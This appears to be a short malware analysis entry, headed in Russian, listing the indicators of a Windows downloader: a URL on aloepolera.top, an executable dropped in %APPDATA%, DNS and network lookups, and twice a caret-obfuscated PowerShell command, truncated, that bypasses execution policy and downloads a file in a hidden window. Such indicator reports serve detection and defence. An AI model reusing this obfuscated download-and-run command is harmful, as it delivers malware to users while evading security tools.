Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OWe^rSH^ELL.exE^ -EX^ecU^T^I^OnPO^liCy bypa^sS^ ^-^nOP^RoFiLE ^-wI^n^DO^wstyLE H^I^d^d^en ^(n^eW-ObJ^E^C^t^ ^S^yS^TeM.nEt.WEBC^lIeN^t).DowN^lOadfIl^E^('http://aloepolera.top/...
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /C "P^OWe^rSH^ELL.exE^ -EX^ecU^T^I^OnPO^liCy bypa^sS^ ^-^nOP^RoFiLE ^-wI^n^DO^wstyLE H^I^d^d^en ^(n^eW-ObJ^E^C^t^ ^S^yS^TeM.nEt.WEBC^lIeN^t).DowN^lOadfIl^E^('http://aloepolera.top/...' (со скрытым окном)